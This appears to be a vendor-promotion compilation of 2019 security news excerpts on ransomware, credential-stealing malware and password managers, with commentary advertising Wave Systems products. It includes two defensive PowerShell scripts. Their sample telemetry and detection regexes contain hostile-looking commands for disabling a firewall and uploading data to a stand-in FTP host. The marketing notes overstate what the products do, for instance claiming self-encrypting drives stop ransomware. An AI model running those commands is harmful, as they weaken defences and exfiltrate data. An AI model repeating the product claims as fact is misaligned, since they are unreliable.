On Christmas Eve 2018, cloud data hosting firm Dataresolution.net was hit with the Ryuk strain of ransomware. More than a week later on Jan. 2, 2019, this blog reported that the company — which had chosen not to pay the ransom and instead restore everything from backups — was still struggling to bring its systems back online.
One dataresolution.net client said the company didn’t succeed in rebuilding its server or turning over his company’s database stored there until Jan. 9 — 16 days after the ransomware outbreak.
“From my understanding it was another two weeks until all of the clients were rebuilt,” said the customer, who works as an IT manager at a benefits management firm that used dataresolution.net and is now transitioning away from the company. “The vendor never provided any analysis on how it occurred and how they would prevent it from occurring again. Other than different antivirus and not allowing RDP connections to the internet they don’t seem to have put any additional safeguards in place. They did not proactively offer any compensation for the outage. I am in the process of documenting the business financial impact to request a ‘credit’ at the same time as planning on bringing the system in house.”
For its part, Apex is still trying to determine how the ransomware got into its systems.
“That’s where this forensic analysis is still going on,” Oxman said. “For us, the emergency response team literally worked 48 hours straight getting our systems back up, and secondary to that is now trying to figure out what the hell happened and how do we prevent this from happening again. We had just completed a security audit and we were feeling pretty good. Obviously, these cyber hackers found a way in, but I’m sure that’s how every company feels that gets hit.”
Here are a few tips for preventing and dealing with ransomware attacks:
- Patch, early and often: Many ransomware attacks leverage known security flaws in servers and desktops.
- Disable RDP: Short for Remote Desktop Protocol, this feature of Windows allows a system to be remotely administered over the Internet. A ridiculous number of businesses — particularly healthcare providers — get hit with ransomware because they leave RDP open to the Internet and secured with easy-to-guess passwords. And there are a number of criminal services that sell access to brute-forced RDP installations.
- Filter all email: Invest in security systems that can block executable files at the email gateway.
- Isolate mission-critical systems and data: This can be harder than it sounds. It may be worth hiring a competent security firm to make sure this is done right.
- Back up key files and databases: Bear in mind that ransomware can encrypt any network or cloud-based files or folders that are mapped and have been assigned a drive letter. Backing up to a secondary system that is not assigned a drive letter or is disconnected when it’s not backing up data is key. The old “3-2-1” backup rule comes into play here: Wherever possible, keep three backups of your data, on two different storage types, with at least one backup offsite.
- Disable macros in Microsoft Office: Block external content in Office files. Educate users that ransomware very often succeeds only when a user opens an Office file attachment sent via email and manually enables macros.
- Enable controlled folder access: Create rules to disallow the running of executable files in Windows from local user profile folders (App Data, Local App Data, ProgramData, Temp, etc.).
Sites like nomoreransom.org distribute free tools and tutorials that can help some ransomware victims recover files without paying a ransom demand, but those tools often only work with specific versions of a particular ransomware strain.
==================================================================
How can Wave help organizations protect against ransomware attacks?
1. Wave Endpoint Monitor is more encompassing than anti-virus software. It can spot those sneaky attacks.
2. One of Wave VSC 2.0's key features is Remote Desktop Access. RDP is recommended to be disabled in this article probably since it doesn't have 2FA like Wave VSC 2.0.
3. SEDs, when initialized by Wave SED management, leave little to no danger of a successful ransomware attack on those SEDs.
=================================================================
https://www.wavesys.com/products/wave-endpoint-monitor
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/wave-self-encrypting-drive-management
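The ransomware tips in the KrebsOnSecurity article above (RDP, Office macros, controlled folder access, mapped backup drives, patching) map to concrete Windows settings that can be audited. The script below is an added example, not code from the article or from Wave; it is read-only, runs in an elevated PowerShell on the host being checked, and assumes the Office 16.0 policy key (adjust for other Office releases).

```powershell
# Added example (not from the article): read-only audit of the Windows settings
# behind the ransomware tips above. Run elevated on the host being checked.

function Get-RegValue {
    param([string]$Path, [string]$Name)
    # Return $null when the key or value is absent instead of throwing
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name } catch { $null }
}

function New-Finding([string]$Check, [bool]$Ok, [string]$Detail) {
    [pscustomobject]@{ Check = $Check; Status = $(if ($Ok) { 'OK' } else { 'REVIEW' }); Detail = $Detail }
}

function Test-RansomwareHygiene {
    $findings = @()

    # 1. RDP: fDenyTSConnections = 1 means Remote Desktop is disabled
    $ts = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    $deny = Get-RegValue $ts 'fDenyTSConnections'
    $findings += New-Finding 'RDP disabled' ($deny -eq 1) "fDenyTSConnections=$deny"
    if ($deny -ne 1) {
        # If RDP stays on, at least require Network Level Authentication before logon
        $nla = Get-RegValue "$ts\WinStations\RDP-Tcp" 'UserAuthentication'
        $findings += New-Finding 'RDP requires NLA' ($nla -eq 1) "UserAuthentication=$nla"
    }

    # 2. Office macros (policy hive; 16.0 is an assumption): VBAWarnings 4 = all macros
    #    disabled without notification, 3 = all but digitally signed;
    #    blockcontentexecutionfrominternet = 1 blocks macros in files that carry the
    #    Mark of the Web, i.e. email attachments and web downloads
    foreach ($app in 'Word', 'Excel', 'PowerPoint') {
        $pol  = "HKCU:\Software\Policies\Microsoft\Office\16.0\$app\Security"
        $vba  = Get-RegValue $pol 'VBAWarnings'
        $motw = Get-RegValue $pol 'blockcontentexecutionfrominternet'
        $findings += New-Finding "$app macros restricted" ($vba -in 3, 4) "VBAWarnings=$vba"
        $findings += New-Finding "$app blocks internet macros" ($motw -eq 1) "blockcontentexecutionfrominternet=$motw"
    }

    # 3. Controlled folder access (Defender): 1 = enabled, 2 = audit only, 0/absent = off
    $cfa = try { (Get-MpPreference -ErrorAction Stop).EnableControlledFolderAccess } catch { $null }
    $findings += New-Finding 'Controlled folder access' ($cfa -eq 1) "EnableControlledFolderAccess=$cfa"

    # 4. Mapped network drives: anything with a drive letter is reachable by ransomware
    #    running as this user, so backup targets should not appear in this list
    $mapped = Get-PSDrive -PSProvider FileSystem | Where-Object { $_.DisplayRoot -like '\\*' }
    $list = ($mapped | ForEach-Object { "$($_.Name): -> $($_.DisplayRoot)" }) -join '; '
    $findings += New-Finding 'No mapped drives for backups' (-not $mapped) $(if ($list) { $list } else { 'none' })

    # 5. Patching: age of the most recently installed update
    $last = Get-HotFix | Where-Object InstalledOn | Sort-Object InstalledOn -Descending | Select-Object -First 1
    $age = if ($last) { (New-TimeSpan -Start $last.InstalledOn -End (Get-Date)).Days } else { $null }
    $findings += New-Finding 'Patched within 30 days' ($age -ne $null -and $age -le 30) "last hotfix $($last.HotFixID) $age day(s) ago"

    $findings
}

Test-RansomwareHygiene | Format-Table -AutoSize
```

Each row marked REVIEW points at one of the tips above; the script changes nothing, so it is safe to run on a production host before deciding which settings to enforce by Group Policy.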
Fix Windows Hello errors while creating a PIN on Windows 10
https://www.thewindowsclub.com/windows-10-pin-errors
==================================================================
In addition to the user experience being simple, the setup of the PIN for Wave VSC 2.0 could be simpler than Windows Hello! The above article shows how things can get gnarly in setting up the PIN for Windows Hello.
==================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
Excerpt:
The user experience with a virtual smart card is simple: he or she logs in with a PIN (authentication factor number one). The TPM (authentication factor number two) then transparently identifies the device to the network and connects the user to all the approved services. It’s one less thing for users to carry around.
92% of organizations rank users as their primary security concern
https://www.helpnetsecurity.com/2019/02/22/users-primary-security-concern/
Cybercrime continues to evolve and become more sophisticated. AI and machine learning are leveraged by many criminal organizations to help them better understand how to improve their attacks, and they are now targeting specific industry verticals, organizations and even individuals. Increases in the frequency of ransomware, phishing and cryptojacking attacks were experienced by businesses of nearly every size, vertical and locale.
On average, 81% of organizations had some degree of concern around security issues, according to the results of new research: What Keeps You Up at Night – The 2019 Report, released by KnowBe4.
When it came to attack vectors, data breaches were the primary concern, with credential compromise coming in as a close second. These two issues go hand-in-hand, as misuse of credentials remains the number one attack tactic in data breaches, according to Verizon’s 2018 Data Breach Investigations Report. Phishing and ransomware ranked next, demonstrating that organizations are still not completely prepared to defend themselves against these relatively “old” attack vectors.
Other key findings from the report include:
• 92% of organizations rank users as their primary security concern. And at the same time, security awareness training along with phishing testing topped the list of security initiatives that organizations need to implement.
• Organizations today have a large number of attack vectors to prevent, monitor for, detect, alert and remediate; in terms of attacks, 95 per cent of organizations are most concerned with data breaches.
• Ensuring security is in place to meet GDPR requirements is still a challenge for 64 per cent of organizations, despite the regulation details being out for quite some time.
• Attackers’ utilization of compromised credentials is such a common tactic, 93 per cent of organizations are aware of the problem, but still have lots of work to do to stop it.
• When it comes to resources, 75 per cent of organizations do not have an adequate budget.
“2018 was a prolific year for successful cyberattacks, and many of them were caused by human error,” said Stu Sjouwerman, CEO of KnowBe4. “IT organizations are tasked with establishing and maintaining a layered security defence. The largest concern, as demonstrated again in this report, is employees making errors. Organizations must start with establishing a security culture, and in order to combat the escalation of social engineering, they have to ensure users are trained and tested.”
==================================================================
1. Train employees to keep them from becoming victims of phishing attacks. Result: Not all employees even after training will recognize new and more clever phishing attacks.
Vs.
2. Buy Wave VSC 2.0 solution and have the second factor of authentication (TPM) prevent the hacker from being able to use the phished credentials. Result: Better than #1 (training method).
And 93% of organizations are aware of the compromised credential problem (see article), but still have lots of work to do to stop it. Why not use method #2 for all these organizations!?
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
Excerpt:
The user experience with a virtual smart card is simple: he or she logs in with a PIN (authentication factor number one). The TPM (authentication factor number two) then transparently identifies the device to the network and connects the user to all the approved services. It’s one less thing for users to carry around.
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpt:
Key Features:
Strong Security
Protect against phishing, malware and other network security threats by storing authentication credentials in hardware
Hard-to-detect credential-theft malware has infected 1,200 and is still going
https://arstechnica.com/information-technology/2019/02/hard-to-detect-credential-theft-malware-has-infected-1200-and-is-still-going/
Separ's living-off-the-land approach bypasses many antimalware providers.
A deceptively simple malware attack has stolen a wide array of credentials from thousands of computers over the past few weeks and continues to steal more, a researcher warned on Tuesday.
The ongoing attack is the latest wave of Separ, a credential stealer that has been known to exist since at least late 2017, a researcher with security firm Deep Instinct said. Over the past few weeks, the researcher said, Separ has returned with a new version that has proven surprisingly adept at evading malware-detection software and services. The source of its success: a combination of short scripts and legitimate executable files that are used so often for benign purposes that they blend right in. Use of spartan malware that's built on legitimate apps and utilities has come to be called "living off the land," and it has been used in a variety of highly effective campaigns over the past few years.
The latest Separ arrives in what appears to be a PDF document. Once clicked, the file runs a chain of other apps and file types that are commonly used by system administrators. An inspection of the servers being used in the campaign show that it, so far, has collected credentials belonging to about 1,200 organizations or individuals. The number of infections continues to rise, which indicates that the spartan approach has been effective in helping it fly under the radar.
"Although the attack mechanism used by this malware is very simple, and no attempt has been made by the attacker to evade analysis, the growth in the number of victims claimed by this malware shows that simple attacks can be very effective," Guy Propper, Deep Instinct's threat intelligence team leader, wrote in a blog post. "The use of scripts and legitimate binaries, in a 'living off the land' scenario, means the attacker successfully evades detection, despite the simplicity of the attack."
In this latest wave, Separ is bundled into a self-extracting executable file that uses an icon to disguise itself as a PDF document. Double clicking the file runs a chain of files that starts with a Visual Basic script. The script, in turn, executes a batch script. The batch script sets up several directories, copies files to them, and then launches a second batch script. The second script opens a decoy image to hide command windows, lowers firewall protections, and saves the results of an ipconfig /all command to a file.
The batch file then runs four executable tools that are used for legitimate purposes. The first two executables are password-dumping tools from security research organization SecurityXploded. The third executable runs the legitimate NcFTP client to upload pilfered data to previously configured accounts on the Free Hostia hosting service. The fourth executable bundles the legitimate xcopy.exe, attrib.exe, and sleep.exe apps it needs to perform mundane tasks.
[Figure: An email-password dump with redacted credentials and ipconfig data. Credit: Deep Instinct]
"As can be seen above, the attackers make no attempt to hide their intentions and use no obfuscation or evasion techniques," Propper wrote. "In addition, all the output file names and credentials used by the attackers are hard-coded in the scripts."
Turning the tables on the bad guys
The hard-coded credentials allowed Deep Instinct to turn the tables on the attackers and access two of the accounts they used to store the pilfered data. The researchers later gained access to eight other accounts. As of Tuesday afternoon, the accounts stored credentials belonging to about 1,000 individuals and 200 organizations. The number of collected credentials has steadily grown over the course of the past few weeks, and the researchers suspect there may be additional accounts storing still more.
So far, Propper said, officials at Freehostia haven't responded to private messages from Deep Instinct reporting the abuse of the hosting service. A message Ars sent Freehostia seeking comment for this post also went unanswered. Propper said Deep Instinct has notified infected individuals and organizations that their credentials have been harvested.
About the only thing required for the recent Separ campaign to succeed, at least initially, was for an end user to click on a disguised executable. Propper said, over time, a growing number of antimalware providers has come to detect the attack. Still, the ongoing attacks are a reminder that—despite the growing sophistication of many of today's malware attacks—simple, sparse hacks remain painfully effective.
=================================================================
This is not the first 'malware/stolen credentials' situation that has come up in the past, so a proactive approach in using Wave VSC 2.0 could prevent stolen credentials from inappropriate access (hacker needs the second factor - TPM), and Wave Endpoint Monitor could prevent 'sneaky' malware attacks from even collecting the stolen credentials.
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/malware-protection
https://www.wavesys.com/products/wave-endpoint-monitor
=================================================================
These two Wave solutions could provide much better cybersecurity to the ongoing problem in the article above.
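The Separ chain described in the Ars Technica article above (a script host launching batch files that lower the firewall, run ipconfig /all and upload results with an NcFTP binary) is the kind of pattern that process-creation telemetry can surface even when each binary is legitimate. The function below is an added example, not code from Ars Technica or Deep Instinct; the event records are constructed, the field names follow Security event 4688 / Sysmon event 1 style, and the indicator regexes are assumptions about how each step appears on a command line.

```powershell
# Added example (not from the article or Deep Instinct): hunt process-creation
# records for a script host whose descendants show two or more of the
# living-off-the-land steps described above.

function Find-ScriptHostLolbinChains {
    param([Parameter(Mandatory)][object[]]$Events)

    # Index records by process id so parent chains can be walked
    $byPid = @{}
    foreach ($e in $Events) { $byPid[[int]$e.ProcessId] = $e }

    $scriptHosts = 'wscript.exe', 'cscript.exe'
    # Indicator regexes are assumptions about how each step looks in a command line
    $indicators = @(
        @{ Name = 'firewall-lowered'; Pattern = 'netsh\s+(advfirewall|firewall)\b.*\b(off|disable)\b' },
        @{ Name = 'ipconfig-run';     Pattern = '(^|\\)ipconfig(\.exe)?\s+/all\b' },
        @{ Name = 'ftp-upload';       Pattern = '(^|\\)ncftp\w*(\.exe)?\b' },
        @{ Name = 'attrib-hide';      Pattern = '(^|\\)attrib(\.exe)?\s+\+[hs]' }
    )

    $hits = @{}   # root script-host pid -> indicator names seen beneath it
    foreach ($e in $Events) {
        $matched = @($indicators | Where-Object { $e.CommandLine -match $_.Pattern } | ForEach-Object { $_.Name })
        if ($matched.Count -eq 0) { continue }

        # Walk up the (bounded) parent chain looking for a script-host ancestor
        $cur = $e; $root = $null
        for ($depth = 0; $cur -and $depth -lt 10; $depth++) {
            $image = ($cur.Image -split '[\\/]')[-1].ToLower()
            if ($image -in $scriptHosts) { $root = $cur; break }
            $cur = $byPid[[int]$cur.ParentProcessId]
        }
        if (-not $root) { continue }

        $key = [int]$root.ProcessId
        if (-not $hits.ContainsKey($key)) { $hits[$key] = [System.Collections.Generic.List[string]]::new() }
        $hits[$key].AddRange([string[]]$matched)
    }

    # Report only roots with two or more distinct indicators, so an admin script
    # that legitimately runs a single ipconfig or netsh is not flagged
    foreach ($key in $hits.Keys) {
        $names = @($hits[$key] | Sort-Object -Unique)
        if ($names.Count -ge 2) {
            [pscustomobject]@{
                RootProcessId = $key
                RootCommand   = $byPid[$key].CommandLine
                Indicators    = ($names -join ', ')
            }
        }
    }
}

# Constructed telemetry modelled on the described chain, plus a benign admin session
$sample = @(
    [pscustomobject]@{ ProcessId = 100; ParentProcessId = 1;   Image = 'C:\Windows\explorer.exe';            CommandLine = 'explorer.exe' },
    [pscustomobject]@{ ProcessId = 200; ParentProcessId = 100; Image = 'C:\Users\alice\Downloads\Invoice.exe'; CommandLine = '"C:\Users\alice\Downloads\Invoice.exe"' },
    [pscustomobject]@{ ProcessId = 300; ParentProcessId = 200; Image = 'C:\Windows\System32\wscript.exe';    CommandLine = 'wscript.exe "C:\Users\alice\AppData\Local\Temp\run.vbs"' },
    [pscustomobject]@{ ProcessId = 400; ParentProcessId = 300; Image = 'C:\Windows\System32\cmd.exe';        CommandLine = 'cmd.exe /c "C:\Users\alice\AppData\Local\Temp\first.bat"' },
    [pscustomobject]@{ ProcessId = 500; ParentProcessId = 400; Image = 'C:\Windows\System32\cmd.exe';        CommandLine = 'cmd.exe /c "C:\Users\Public\second.bat"' },
    [pscustomobject]@{ ProcessId = 600; ParentProcessId = 500; Image = 'C:\Windows\System32\netsh.exe';      CommandLine = 'netsh advfirewall set allprofiles state off' },
    [pscustomobject]@{ ProcessId = 601; ParentProcessId = 500; Image = 'C:\Windows\System32\ipconfig.exe';   CommandLine = 'ipconfig /all' },
    [pscustomobject]@{ ProcessId = 602; ParentProcessId = 500; Image = 'C:\Users\Public\ncftpput.exe';       CommandLine = 'C:\Users\Public\ncftpput.exe -u user ftp.example.invalid .' },
    # Benign: an administrator running ipconfig from an interactive shell
    [pscustomobject]@{ ProcessId = 700; ParentProcessId = 100; Image = 'C:\Windows\System32\cmd.exe';        CommandLine = 'cmd.exe' },
    [pscustomobject]@{ ProcessId = 701; ParentProcessId = 700; Image = 'C:\Windows\System32\ipconfig.exe';   CommandLine = 'ipconfig /all' }
)

# Flags root 300 (wscript.exe) with firewall-lowered, ftp-upload, ipconfig-run;
# the interactive ipconfig under pid 700 has no script-host ancestor and is ignored
Find-ScriptHostLolbinChains -Events $sample | Format-List
```

On a live host the same function can be fed objects built from Get-WinEvent output (Security 4688 with command-line auditing enabled, or Sysmon event 1), which is where the parent/child relationships come from in practice.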
Russian cyberattackers are in and gone in less than 20 minutes
https://www.scmagazine.com/home/network-security/russian-cyberattackers-are-in-and-gone-in-less-than-20-minutes/
Russian threat actors are almost eight times faster at taking advantage of a compromised system compared to other nation-state actors, a tribute to their operational tradecraft, according to Crowdstrike’s 2019 Global Threat report.
An analysis of what Crowdstrike calls “breakout time” shows the Russians are quicker, by a factor of eight, at moving laterally through a system and accomplishing their primary objectives than their next closest competitor, the North Koreans.
The report noted this level of accomplishment is even more impressive considering the North Korean threat teams themselves are twice as fast as the third-place Chinese crews. Iran was the fourth quickest while various cybercrime actors were fifth. Russians are typically able to do this in just under 19 minutes, compared to two and a half hours for the North Koreans and four hours eight minutes for the Chinese.
One bit of good news in this category is that overall the average breakout time across all threats in 2019 was four hours and 37 minutes, more than twice as long as the one hour and 58 minutes logged by Crowdstrike in 2017. The report credited two possible factors for this jump: an increase in the number of slower attackers and more organizations deploying next-generation endpoint security.
In order to combat effective attackers like the Russians, Crowdstrike recommends companies employ the 1-10-60 rule. This requires an intrusion be detected in under a minute, a full investigation be performed in 10 minutes and the adversary eradicated from the system within an hour.
=================================================================
Isn't it about time that organizations employ a better rule? Only known devices allowed on a sensitive network! (see link below for known devices) The 1-10-60 rule is a labor intensive rule, and how effective is it really? Wave VSC 2.0 - Better security at less than half the cost!! Links below reveal solutions from Wave that should have enabled a new paradigm some time ago!
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpts:
Here’s how it works:
Trusted Platform Module (TPM) + Wave’s ERAS for TPM Management = hardware-secured, fully-managed authentication
Most of your devices already come with TPMs (check out our “What is a TPM?” brochure if you’re not sure why this is exciting). This security chip comes attached to the motherboard of most enterprise-class PCs. There’s nothing “add-on” about it. The TPM provides a verifiable, unique identity for each machine.
Wave’s ERAS for TPM Management gives IT remote, centralized management of all TPMs on enterprise computers and tablets.
With this control, IT can set policies and dictate which machines and users have authority to access which resources. IT can ensure that only known and approved devices are accessing your network. And what’s more, IT can prove it with detailed activity logs.
=================================================================
https://www.wavesys.com/products/wave-endpoint-monitor
https://www.wavesys.com/products/wave-self-encrypting-drive-management
The Average Ransomware Payment Is Rising
https://www.infosecurity-magazine.com/infosec/the-average-ransomware-payment-is-1?utm_source=twitterfeed&utm_medium=twitter
The average ransomware payment is growing as criminals become more sophisticated in their attacks, according to a report released by ransomware incident response company Coveware.
According to Coveware’s Q4 2018 Global Ransomware Marketplace Report, the average ransom increased by 13% to $6733 in Q4 2018 compared to Q3’s $5973.
It's difficult to judge the statistical margin of error for these figures because the company, which bases the data on ransomware cases handled by its support team, doesn't divulge the exact number of ransomware cases that it has dealt with. However, it says that the increase is probably down to the more targeted nature of recent attacks. Attackers focused on larger targets and honed their attacks using social engineering, it explains. It pointed to the rising use of ransomware strains that tend to demand higher ransoms, like SamSam and Ryuk.
The average ransomware incident lasted 6.2 days and cost $54,904 in downtime, according to the company, which said that the average ransomware-related downtime increased 47% over Q3.
The biggest factor in that increasing downtime is the rising number of compromised backup systems. 75% of organizations that paid a ransom had their backups encrypted by ransomware too, the company said.
Professional services was the hardest-hit sector at 22.4%, followed by software services (13.8%) and financial services and healthcare, the latter two sectors each garnering 12.1%.
“We also observed an increase in local healthcare facilities being targeted," the report said. "These attacks typically caused the facility to close their doors until critical scheduling and patient EMR servers could be recovered.”
Coveware calls itself a “first responder” for ransomware incidents. One of its services includes ransomware payments. The company will facilitate a rapid payment so that customers get their files back. The report claims that 93% of ransomware crooks sent a decryption tool upon receipt of a ransom payment. On average, victims were able to recover around 95% of their data with these tools.
==================================================================
Organizations should have their SEDs initialized (can be done remotely by Wave SED management) to stop ransomware. This article shows that, in addition to the headaches saved, they could save monetarily by having their SEDs with Wave SED management!!
==================================================================
Link below summarizes the many great features of Wave SED management including initializing remotely!
https://www.wavesys.com/products/wave-self-encrypting-drive-management
Password manager flaws can expose data on compromised devices, report says
https://www.scmagazine.com/home/security-news/password-manager-flaws-can-expose-data-on-compromised-devices-report-says/
Flaws in top password managers can expose the very data they are supposed to protect, a study by researchers at Independent Security Evaluators (ISE) found.
“100 percent of the products that ISE analyzed failed to provide the security to safeguard a user’s passwords as advertised,” ISE CEO Stephen Bono said in a release announcing the findings of “Under the Hood of Secrets Management.” “Although password managers provide some utility for storing login/passwords and limit password reuse, these applications are a vulnerable target for the mass collection of this data through malicious hacking campaigns.”
Assessing the underlying functionality of 1Password, Dashlane, KeePass and LastPass on Windows 10, researchers discovered that in some cases, the master password could be found in plaintext in the computer’s memory when the password manager was locked and that they could extract the master password using standard memory forensics.
“Given the huge user base of people already using password managers, these vulnerabilities will entice hackers to target and steal data from these computers via malware attacks,” ISE Lead Researcher Adrian Bednarek said, noting that once hackers get their hands on the master password, “it’s game over.”
Sandor Palfy, LastPass CTO, said in a statement sent to SC Media that the “particular vulnerability, in LastPass for Applications,” the company’s “legacy, local Windows Application (which accounts for less than .2 percent of all LastPass usage) was brought to our attention by researchers through our Bug Bounty Program.”
He explained that to be able to “read the memory of an application, an attacker would need to have local access and admin privileges to the compromised computer.” The company has “already implemented changes to LastPass for Applications designed to mitigate and minimize the risk of the potential attack detailed in this report,” said Palfy. “To mitigate risk of compromise while LastPass for Applications is in a locked state, LastPass for Applications will now shut down the application when the user logs out, clearing the memory and not leaving anything behind.”
He said there’s no indication that sensitive LastPass user data was compromised. “As always, delivering a secure service for our users remains our top priority and we will continue to work with the security community to respond and fix potential vulnerability reports as quickly as possible,” said Palfy.
Dashlane CEO Emmanuel Schalit said the scenario outlined by the ISE researchers “is that of an attacker who would have taken total control of a user’s device,” a standard question in security not limited to Windows 10 but which “applies to any operating system and any digital device connected to the internet” and which are known to security pros as part of the security audit.
The company, in fact, has included the scenario in one of its whitepapers. “Even if consumers most likely do not read our security whitepapers, most of the large business clients that have adopted our (or any other identity management solution) are well aware of this type of scenario as part of their security audits,” Schalit said.
“It is indeed correct that if an attacker has full control of a device at the lowest operating systems level, the attacker can read any and every information on the device,” he said. “This is not the case just with Dashlane or with password managers, but of any software or in fact any device that stores digital information. In such a case, the attacker can also see everything that is typed by the user including passwords and credit card numbers, any information being exchanged by the device over the internet even if it is sent over https, any information the device is able to capture (audio, video, etc.) through the hardware attached to it, regardless of whether the user employs a password manager or not.”
While no mechanism can protect digital information on a fully compromised device, Schalit explained that data stored by Dashlane on a “device (i.e. on the hard drive) is encrypted and cannot be read by an attacker even if the attacker has full control of the device. This only applies to the data present in the memory of the device when Dashlane is being used by a user who has typed the Master Password.”
He warned against recommending people not use software or technology unless it’s 100 percent foolproof. “This leads to consumers having no protection against the most common threats (reusing passwords that can be stolen in large quantity online by hackers who target millions of consumers in one attack) for fear of a much less likely threat (an attacker being able to specifically take control of the device of a single user),” he said, noting the very real security problems caused by consumer apathy. “At the end of the day the only real protection against a scenario where an attacker has fully compromised a device is to not use that device.”
==================================================================
Wave VSC 2.0 could be a much better alternative than password managers in the enterprise since the user's credentials are secured in the TPM (hardware)!!
==================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
Excerpt:
The user experience with a virtual smart card is simple: he or she logs in with a PIN (authentication factor number one). The TPM (authentication factor number two) then transparently identifies the device to the network and connects the user to all the approved services. It’s one less thing for users to carry around.
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpt:
Token-free, password-free user authentication
We know you’ve dreamt about shredding your list of passwords. Go on and do it.
Because you are starting the authentication process in the device’s hardware, the user doesn’t have to interact with it. All users see is their usual Windows log-in screen – no more additional passwords to access the VPN or other resources. They just sign in once, and the secure credentials in their TPMs securely and quickly connect them to everything they need. Say goodbye to user frustration and slow OS performance.
Windows 7 users: You need SHA-2 support or no Windows updates after July 2019
https://www.zdnet.com/article/windows-7-users-you-need-sha-2-support-or-no-windows-updates-after-july-2019/
Microsoft will begin rolling out SHA-2 standalone updates for Windows 7 and Windows Server 2008 in March in preparation for its July 16 implementation deadline.
Windows 7 and Windows Server 2008 users need to have SHA-2 code-signing installed by July 16, 2019, in order to continue to get Windows updates after that date. Microsoft issued that warning on February 15 via a Support article.
Windows operating system updates are dual-signed using both the SHA-1 and SHA-2 hash algorithms to prove authenticity. But going forward, due to "weaknesses" in SHA-1, Microsoft officials have said previously that Windows updates will be using the more secure SHA-2 algorithm exclusively. Customers running Windows 7 SP1, Windows Server 2008 R2 SP1 and Windows Server 2008 SP2 must have SHA-2 code-signing support installed by July 2019, Microsoft officials have said.
Microsoft has published a timeline for migrating these operating systems to SHA-2, with support for the algorithm coming in standalone updates. On March 12, Microsoft is planning a standalone update with SHA-2 code sign support for Windows 7 SP1 and Windows Server 2008 R2 SP1. It also will deliver to WSUS 3.0 SP2 the required support for delivering SHA-2 updates.
Microsoft will make available a standalone update with SHA-2 code sign support for Windows Server 2008 SP2 on April 9, 2019.
On June 18, Windows 10 updates -- 1709, 1803, 1809 and Server 2019 -- will have their signatures changed from dual-signed SHA-1/SHA-2 to SHA-2 only with no customer action required.
The full cut-over timetable is available on Microsoft's support page.
SHA-1, or Secure Hash Algorithm 1, was introduced by the National Security Agency in 2002. It has been used in SSL certificates, encrypted communications and code revision-control systems. SHA-2 uses SHA-1's algorithm, but it uses different input and output sizes for far superior security. Microsoft began blocking sites signed with SHA-1 certificates in its Edge and IE browsers back in 2017.
==================================================================
Since the Windows 7 computer, if upgraded to Windows 10, would still have the TPM 1.2 (SHA-1), Microsoft would be very strongly pushing companies to buy new Windows 10 computers (TPM 2.0, SHA-2) by July 2019. Many organizations, for financial and logistical reasons, would need to stay with Windows 7, and Wave Endpoint Monitor (WEM) could be a great solution to spot malware in these systems that lack software updates! Of course, buying Windows 10 computers with SEDs and Wave SED management to stop ransomware, in addition to its other features, could be another great solution for organizations.
Wave's solutions could greatly enhance the cybersecurity for Windows 7-10 computers and tablets!
=================================================================
https://www.wavesys.com/products/wave-endpoint-monitor
https://www.wavesys.com/malware-protection
https://www.wavesys.com/products/wave-self-encrypting-drive-management
https://www.wavesys.com/
Trickbot becomes one of the most dangerous pieces of modular malware hitting enterprises
https://www.helpnetsecurity.com/2019/02/14/trickbot-business-threat/
Along with Emotet, Trickbot has become one of the most versatile and dangerous pieces of modular malware hitting enterprise environments.
Most recently, its creators have added another dangerous module to it, which allows it to extract and exfiltrate credentials from popular remote access software.
Trickbot’s evolution
Like Emotet, Trickbot started as a pure banking Trojan but was slowly developed through the years and now has many more additional capabilities. It can:
• Achieve persistence (through scheduled tasks)
• Disable Microsoft's built-in antivirus Windows Defender
• Gather email addresses and send out spam
• Gather system and memory information, user accounts, lists of installed programs and services
• Fingerprint browsers and collect data from them (including passwords)
• Steal passwords from Microsoft Outlook and file transfer apps like WinSCP and Filezilla
• Spread itself to other computers on the same network by exploiting SMB vulnerabilities with the EternalRomance exploit.
Apart from propagating itself via SMB exploits, Trickbot is often dropped by Emotet as a secondary payload. It also arrives in targets’ inboxes via emails carrying malicious URLs and booby-trapped attachments (Word documents with macros).
A new capability
As mentioned before, the latest variant of the malware has acquired a new capability: stealing VNC, PuTTY and RDP credentials.
It extracts VNC credentials from *.vnc.lnk files, PuTTY credentials from saved connection settings, and RDP credentials by taking advantage of the CredEnumerateA API.
The information is then exfiltrated to C&C servers and later likely used to achieve continuous access to infected hosts and/or the network and, apparently, to deliver Ryuk ransomware, which specializes in targeting enterprises.
“These new additions to the already ‘tricky’ Trickbot show one strategy that many authors use to improve the capabilities of their creations: gradual evolution of existing malware,” Trend Micro researchers noted.
“While this new variant is not groundbreaking in terms of what it can do, it proves that the groups or individuals behind Trickbot are not resting on their laurels and continuously improve it, making an already-dangerous malware even more effective.”
Dealing with Trickbot
Most users are unlikely to notice that they’ve been infected with Trickbot, so it’s on enterprise administrators to detect the malware communicating with its C&Cs and exfiltrating data to them, and to clean the infected machines.
Despite security awareness and anti-phishing training, sooner or later this or that employee will fall for a malicious email and download Trickbot (or other malware). Patching the SMB vulnerabilities these various threats use to propagate laterally on the network is a must to prevent constant reinfections.
==================================================================
The very potent combination of Wave solutions in Wave Endpoint Monitor and Wave VSC 2.0 could be a tremendous help to the situation in the above article! And disabling antivirus software is not good! The summaries in the links below show why these Wave solutions would be a tremendous help!!
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/malware-protection
https://www.wavesys.com/products/wave-endpoint-monitor
Behold, the Facebook phishing scam that could dupe even vigilant users.
https://arstechnica.com/information-technology/2019/02/behold-the-facebook-phishing-scam-that-could-dupe-even-vigilant-users/
HTML block almost perfectly reproduces Facebook single sign-on Window.
Phishers are deploying what appears to be a clever new trick to snag people’s Facebook passwords by presenting convincing replicas of single sign-on login Windows on malicious sites, researchers said this week.
